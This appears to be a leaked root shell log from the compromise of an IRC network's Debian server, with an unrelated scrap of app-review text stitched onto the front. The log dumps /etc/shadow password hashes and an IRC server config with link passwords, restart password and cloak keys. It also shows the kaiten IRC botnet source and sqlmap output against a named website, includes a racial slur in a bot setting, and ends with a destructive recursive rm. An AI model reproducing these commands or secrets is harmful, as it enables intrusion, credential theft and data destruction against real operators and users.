Pastebot 1 was an iOS app with a small Mac component. Pastebot 2 is a full fledge Mac app which should eventually have an iOS component. Upvote (21) Share 4y. Adin Systems Engineer at Large. @tapbotpaul @t55 the 'widget' approach by copied on iOS is definitely a 90% good enough solution at the moment. Would love to see something similar with. A lightweight, unobtrusive and very easy-to-use menulet that enables you to gain access to your Ma.
Linux lucid.hardchats.xxx 2.6.32-5-vserver-amd64 #1 SMP Wed Apr 9 22:06:23 UTC 2014 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
You have new mail.
Last login: Sat Jul 5 07:09:23 2014 from [snip].dyn.iinet.net.au
Linux lucid.hardchats.xxx 2.6.32-5-vserver-amd64 #1 SMP Wed Apr 9 22:06:23 UTC 2014 x86_64 GNU/Linux
root@lucid:~# cat /etc/shadow
daemon:*:15688:0:99999:7:::
sys:*:15688:0:99999:7:::
games:*:15688:0:99999:7:::
lp:*:15688:0:99999:7:::
news:*:15688:0:99999:7:::
proxy:$6$NzhFFHot$sqSzV43o0AxHAyIj/v6NQtgYFhnIq15VLHK/if7gizP.C.zB.VNBoqUgmtC02gVNVhcBQHyZazkaCk5y7/JBG/:16121:0:99999:7:::
backup:*:15688:0:99999:7:::
irc:*:15688:0:99999:7:::
nobody:*:15688:0:99999:7:::
sshd:*:15688:0:99999:7:::
ircd:$6$8G1Tkz2Z$6e5ov0VaPCQ71LB9RA/LkNeAlJSq2z98A/alQ8JME0vdNDqDzWIU5thHoVjoStpVtqqpBhIuU.8/xE/3WToi.0:15994:0:99999:7:::
bob:$6$wv18oFiG$ysivHkfBJtSvQZ5oK3IguVbMxoOYinmyEw7Mpx87UloRKg70rgm4i8/sErKTztOl.4CEzEFbCKvba.Dv1OYeG/:16014:0:99999:7:::
logcheck:*:16060:0:99999:7:::
root@lucid:~# cat /home/ircd/Unreal3.2.10.1/unrealircd.conf
/* FOR *NIX, uncomment the following 2lines: */
loadmodule 'src/modules/cloak.so';
/* FOR Windows, uncomment the following 2 lines: */
//loadmodule 'modules/cloak.dll';
me {
info 'HardChats';
};
admin {
'Mestri';
};
class clients {
maxclients 20000;
recvq 8000;
class servers {
maxclients 10; /* Max servers we can have linked at a time */
connfreq 100; /* How many seconnection attempt */
#CLIENT ALLOW
ip *@*;
class clients;
};
# ip *@255.255.255.255; hostname *@*.passworded.ugly.people; class clients; password
};
/* Options for listen:
S serversonly
J java
* standard */ listen *:6697 {
{
};
listen *:60000;
/*
OLD | NEW
Z zip
N/A quarantine
link hub.hardchats.org {
hostname 46.4.193.230;
port 60000;
password-connect 'LiNk';
class servers;
autoconnect;
};
ulines {
services.hardchats.org;
};
#DIE/RESTART PASSWORDS
restart 'h08h08bhhhho9bg9';
};
log 'ircd.log' {
flags {
};
#ALIASES
/* Standard aliases */ alias NickServ { type services; }; alias ChanServ { type services; };
alias OperServ { type services; }; alias HelpServ { type services; }; alias StatServ { type
format '^#' {
type services;
};
target 'nickserv';
parameters 'IDENTIFY %1-';
type command;
alias 'services' {
target 'chanserv';
parameters '%1-';
format '^[^#]' {
type services;
};
};
format '^#' {
type services;
};
target 'nickserv';
parameters 'IDENTIFY %1-';
type command;
#NICK BANS [Q:LINES]
mask '*C*h*a*n*S*e*r*v*';
};
ban ip {
reason 'Delinked server';
#EXCEPT FROM BANS
/* don't ban stskeeps */
};
deny channel {
reason 'Warez is illegal';
/* Network configuration */##
network-name 'HardChats';
services-server 'services.hardchats.org';
help-channel '#help';
cloak-keys {
'bdHJkdJ5rtJYGjw0450y2-340wsEDKGWS5630945';
'AAwehrFfqa6508gqfueqEGJWjWFfcjfSJAFsdHJaSD30454';
hosts {
global 'ircop.hardchats.org';
admin 'admin.hardchats.org';
netadmin 'netadmin.hardchats.org';
};
#/* Server specific configuration */
kline-address 'admin@google.com';
modes-on-oper '+xwgs';
options {
/* You can enable ident checking here if you want */
show-connect-info;
maxchannelsperuser 50;
#THROTTLING
connections 3;
};
/* Anti flood protection */
nick-flood 3:60; /* 3 nickchanges per 60 seconds (the default) */
/* Spam filter */
ban-time 1d; /* default duration of a *line ban set by spamfilter */
ban-reason 'Spam/Advertising'; /* default reason */
virus-help-channel '#help'; /* channel to use for 'viruschan' action */
/* except '#help'; channel to exempt from filtering */
tld {
motd 'ircd.motd';
};
#cgiirc {
# hostname 23.21.154.216;
root@lucid:~# ls -la /root
drwx------ 13 root root 4096 Jun 22 08:00 .
drwx------ 2 root root 31 Apr 15 15:14 .aptitude
-rw------- 1 root root 3619 Jul 5 07:45 .bash_history
drwx------ 3 root root 17 Apr 15 13:34 .config
-rw------- 1 root root 19 Jun 7 10:28 .nano_history
-rw-r--r-- 1 root root 140 Nov 19 2007 .profile
-rw-r--r-- 1 root root 25 Jan 30 04:11 .vrs
-rw-r--r-- 1 root root 214 Nov 14 2013 HP1
drwxr-xr-x 7 root root 124 Apr 15 15:06 bot-pastebot
drwxr-xr-x 3 root root 114 Apr 15 14:59 coincheck
-rwxr-xr-x 1 root root 29140 Jun 7 10:10 kaiten
-rw-r--r-- 1 root root 38961 Jun 7 10:10 kaiten.c
-rw-r--r-- 1 root root 6589302 Jun 10 13:47 master
drwxrwxr-x 15 root root 4096 Jun 10 13:48 sqlmapproject-sqlmap-5e9334a
root@lucid:~# head -n 50 /root/kaiten.c | tail -n 10
////////////////////////////////////////////////////////////////////////////////
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME 'dicks' // What you want this to hide as
#define KEY 'bleh' // The key of the channel
int numservers=1; // Must change this to equal number of servers down there
char *servers[] = { // List the servers in that format, always end in (void*)0
root@lucid:~# ls -la /home/bob/sqlmapproject-sqlmap-48bd2e7/output/
drwxr-xr-x 3 bob bob 31 Nov 5 2013 .
drwxr-xr-x 3 bob bob 65 Nov 6 2013 www.bankrotodep.lt
-bash: illegal: command not found
total 216
drwxr-xr-x 12 root root 138 Oct 19 2013 .
-rw-r--r-- 1 root root 4 May 15 10:44 6kf7tosi.txt
-rw-r--r-- 1 root root 4 May 15 10:37 7obuh3a.txt
-rw-r--r-- 1 root root 22516 Jun 11 12:36 Verity_joyce.jpg
-rw-r--r-- 1 root root 4 May 15 10:56 h5n8stdqa.txt
-rw-r--r-- 1 root root 177 Oct 19 2013 index.html
-rw-r--r-- 1 root root 3585 May 15 06:29 index.lighttpd.html
-rw-r--r-- 1 root root 110 Jun 11 12:43 jesus.html
-rw-r--r-- 1 root root 38951 Oct 19 2013 kaiten.c
-rw-r--r-- 1 root root 6 Jun 7 09:55 lol.html
-rw-r--r-- 1 root root 78159 Jun 11 12:41 lol.jpg
-rw-r--r-- 1 root root 6 May 15 06:41 rdqhtehh.txt
-rw-r--r-- 1 root root 81 Jun 11 12:42 verity_joyce.html
root@lucid:~# head -n 50 /var/www/kaiten.c | tail -n 10
////////////////////////////////////////////////////////////////////////////////
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME 'swag' // What you want this to hide as
#define KEY 'niggers' // The key of the channel
int numservers=1; // Must change this to equal number of servers down there
char *servers[] = { // List the servers in that format, always end in (void*)0
root@lucid:~# #coming for those roots
(/dev/pts/2) at 8:14 .
_ _
/ _ / / / '_ / _ / _` | | '_ | | | |
___/ _/_/ |_| |_|___|__,_| |_.__/ __, |
_ _ _ _______________
/ __| '_ | | '_ | '_ | | | | | |_ |_ / /
___|_| |_|_| .__/| .__/ __, |_|____/____//_/
rm: cannot remove `/dev/pts/2': Operation not permitted
rm: cannot remove `/dev/pts/1': Operation not permitted
rm: cannot remove `/dev/pts/0': Operation not permitted
rm: cannot remove `/proc/crypto': Permission denied
rm: cannot remove `/proc/kmsg': Permission denied
rm: cannot remove `/proc/kcore': Permission denied
rm: cannot remove `/proc/version': Permission denied
rm: cannot remove `/proc/uptime': Permission denied
rm: cannot remove `/proc/stat': Permission denied
rm: cannot remove `/proc/meminfo': Permission denied
rm: cannot remove `/proc/loadavg': Permission denied
rm: cannot remove `/proc/interrupts': Permission denied
rm: cannot remove `/proc/devices': Permission denied
rm: cannot remove `/proc/cpuinfo': Permission denied
rm: cannot remove `/proc/locks': Permission denied
rm: cannot remove `/proc/filesystems': Permission denied
rm: cannot remove `/proc/slabinfo': Permission denied
rm: cannot remove `/proc/30435/loginuid': Permission denied
rm: cannot remove `/proc/30435/sessionid': Permission denied
rm: cannot remove `/proc/30435/coredump_filter': Permission denied
rm: cannot remove `/proc/30435/io': Permission denied
rm: cannot remove `/proc/30435/nsproxy': Permission denied
rm: cannot remove `/tmp': Device or resource busy
-bash: /bin/ps: No such file or directory
-bash: messwiththebestdieliketherest.jpg: command not found
Connection to 31.215.205.166 closed by remote host.